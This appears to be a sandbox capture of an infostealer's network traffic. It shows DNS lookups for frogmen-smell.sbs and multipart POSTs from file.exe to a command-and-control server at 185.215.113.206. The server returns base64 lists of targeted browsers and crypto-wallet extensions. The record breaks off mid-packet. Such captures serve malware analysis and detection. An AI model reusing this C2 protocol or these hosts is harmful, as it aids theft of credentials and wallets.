Nov 13, 2024 20:39:43.679716110 CET	1.1.1.1	192.168.2.5	0xc6d1	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.679716110 CET	1.1.1.1	192.168.2.5	0xc6d1	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.679748058 CET	1.1.1.1	192.168.2.5	0x5412	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 13, 2024 20:39:43.705843925 CET	1.1.1.1	192.168.2.5	0xf2aa	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.705843925 CET	1.1.1.1	192.168.2.5	0xf2aa	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:39:43.706449032 CET	1.1.1.1	192.168.2.5	0x2a7	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 13, 2024 20:39:44.043822050 CET	1.1.1.1	192.168.2.5	0x6d8	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 20:39:44.043822050 CET	1.1.1.1	192.168.2.5	0x6d8	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:21.363200903 CET	1.1.1.1	192.168.2.5	0x8471	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:21.363200903 CET	1.1.1.1	192.168.2.5	0x8471	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:32.009277105 CET	1.1.1.1	192.168.2.5	0x2155	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:32.009277105 CET	1.1.1.1	192.168.2.5	0x2155	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:32.009299040 CET	1.1.1.1	192.168.2.5	0x8c9f	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 13, 2024 20:41:32.010309935 CET	1.1.1.1	192.168.2.5	0x963b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 13, 2024 20:41:32.010370016 CET	1.1.1.1	192.168.2.5	0xbb21	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:32.010370016 CET	1.1.1.1	192.168.2.5	0xbb21	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:32.010382891 CET	1.1.1.1	192.168.2.5	0x220c	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:32.010382891 CET	1.1.1.1	192.168.2.5	0x220c	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:41:32.010488987 CET	1.1.1.1	192.168.2.5	0x166c	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 13, 2024 20:41:59.703605890 CET	1.1.1.1	192.168.2.5	0x9466	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 13, 2024 20:41:59.703649044 CET	1.1.1.1	192.168.2.5	0x21a6	No error (0)	www.google.com		142.250.185.196	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:02.971086979 CET	1.1.1.1	192.168.2.5	0xae6c	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 13, 2024 20:42:02.971123934 CET	1.1.1.1	192.168.2.5	0x13bf	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:02.971123934 CET	1.1.1.1	192.168.2.5	0x13bf	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:02.980550051 CET	1.1.1.1	192.168.2.5	0xe013	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 13, 2024 20:42:02.981077909 CET	1.1.1.1	192.168.2.5	0x882a	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:02.981077909 CET	1.1.1.1	192.168.2.5	0x882a	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:02.982731104 CET	1.1.1.1	192.168.2.5	0xf397	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 13, 2024 20:42:02.983186960 CET	1.1.1.1	192.168.2.5	0xbb8d	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:02.983186960 CET	1.1.1.1	192.168.2.5	0xbb8d	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:14.012232065 CET	1.1.1.1	192.168.2.5	0x7e88	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:14.012232065 CET	1.1.1.1	192.168.2.5	0x7e88	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:30.987942934 CET	1.1.1.1	192.168.2.5	0x2ab0	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:30.987942934 CET	1.1.1.1	192.168.2.5	0x2ab0	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:50.131849051 CET	1.1.1.1	192.168.2.5	0x80da	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:42:50.131849051 CET	1.1.1.1	192.168.2.5	0x80da	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:43:13.025140047 CET	1.1.1.1	192.168.2.5	0xe8df	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:43:13.025140047 CET	1.1.1.1	192.168.2.5	0xe8df	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:43:43.657577038 CET	1.1.1.1	192.168.2.5	0xf09e	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:43:43.657577038 CET	1.1.1.1	192.168.2.5	0xf09e	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:44:22.334882021 CET	1.1.1.1	192.168.2.5	0x4088	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:44:22.334882021 CET	1.1.1.1	192.168.2.5	0x4088	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:44:43.965483904 CET	1.1.1.1	192.168.2.5	0xa042	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 13, 2024 20:44:43.966203928 CET	1.1.1.1	192.168.2.5	0x239b	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 13, 2024 20:44:43.966203928 CET	1.1.1.1	192.168.2.5	0x239b	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49720	185.215.113.206	80	2232	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:39:18.694076061 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 13, 2024 20:39:19.613811016 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 13, 2024 20:39:19.616756916 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJ Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 33 45 42 46 43 35 33 37 32 36 33 30 35 30 34 35 37 33 35 38 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="hwid"E83EBFC537263050457358------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="build"mars------IJJJEBFHDBGIECBFCBKJ--
Nov 13, 2024 20:39:19.921221972 CET	407	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:19 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 5a 57 5a 6b 4d 6a 51 79 4d 54 59 32 4d 7a 45 33 59 57 49 79 5a 54 46 6c 4f 57 55 33 4e 44 41 79 4d 7a 51 77 4e 44 56 69 4d 6d 4d 32 5a 54 46 69 4f 47 55 78 59 6d 56 69 4e 47 59 30 59 57 4d 77 4d 6a 51 78 5a 54 45 33 4e 6a 68 6a 4f 57 45 79 4e 7a 41 35 4d 32 4e 6a 4e 6a 55 35 4d 54 56 69 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ZWZkMjQyMTY2MzE3YWIyZTFlOWU3NDAyMzQwNDViMmM2ZTFiOGUxYmViNGY0YWMwMjQxZTE3NjhjOWEyNzA5M2NjNjU5MTVifHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 13, 2024 20:39:19.923130989 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHI Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 2d 2d 0d 0a Data Ascii: ------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="message"browsers------DGDHJEGIEBFHDGDGHDHI--
Nov 13, 2024 20:39:20.212542057 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Nov 13, 2024 20:39:20.212589025 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Nov 13, 2024 20:39:20.213721037 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIJKEHJJDAAKFHIDAKFH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 35 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 4b 45 48 4a 4a 44 41 41 4b 46 48 49 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="token"efd242166317ab2e1e9e740234045b2c6e1b8e1beb4f4ac0241e1768c9a27093cc65915b------FIJKEHJJDAAKFHIDAKFHContent-Disposition: form-data; name="message"plugins------FIJKEHJJDAAKFHIDAKFH--
Nov 13, 2024 20:39:20.502552032 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Nov 13, 2024 20:39:20.502573013 CET	112	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtp
Nov 13, 2024 20:39:20.502774000 CET	1236	IN	Data Raw: 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 Data Ascii: cGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9
Nov 13, 2024 20:39:20.502790928 CET	1236	IN	Data Raw: 61 6d 39 38 4d 58 77 77 66 44 42 38 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 Data Ascii: am98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2p
Nov 13, 2024 20:39:20.502808094 CET	1236	IN	Data Raw: 5a 32 70 6c 62 57 56 72 5a 57 4a 6b 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d Data Ascii: Z2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3B
Nov 13, 2024 20:39:20.502821922 CET	1236	IN	Data Raw: 62 47 31 6e 59 57 35 6d 59 57 46 73 61 32 78 69 66 44 46 38 4d 48 77 77 66 45 4e 76 62 57 31 76 62 6b 74 6c 65 58 78 6a 61 47 64 6d 5a 57 5a 71 63 47 4e 76 59 6d 5a 69 62 6e 42 74 61 57 39 72 5a 6d 70 71 59 57 64 73 59 57 68 74 62 6d 52 6c 5a 48 Data Ascii: bG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR
Nov 13, 2024 20:39:20.502839088 CET	1052	IN	Data Raw: 63 47 4e 6e 5a 57 78 76 63 47 64 38 4d 58 77 77 66 44 42 38 51 32 39 74 63 47 46 7a 63 79 42 58 59 57 78 73 5a 58 51 67 5a 6d 39 79 49 46 4e 6c 61 58 78 68 62 6d 39 72 5a 32 31 77 61 47 35 6a 63 47 56 72 61 32 68 6a 62 47 31 70 62 6d 64 77 61 57 Data Ascii: cGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXw
Nov 13, 2024 20:39:20.504537106 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAE Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 43 47 43 46 48 49 45 48 49 44 47 44 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 64 32 34 32 31 36 36 33 31 37 61 62 32 65 31 65 39 65 37 34 30 32 33 34 30 34 35 62 32 63 36 65 31 62 38 65 31 62 65 62 34 66 34 61 63 30 32 34 31 65 31 37 36 38 63 39 61 32 37 30 39 33 63 63 36 35 39 31 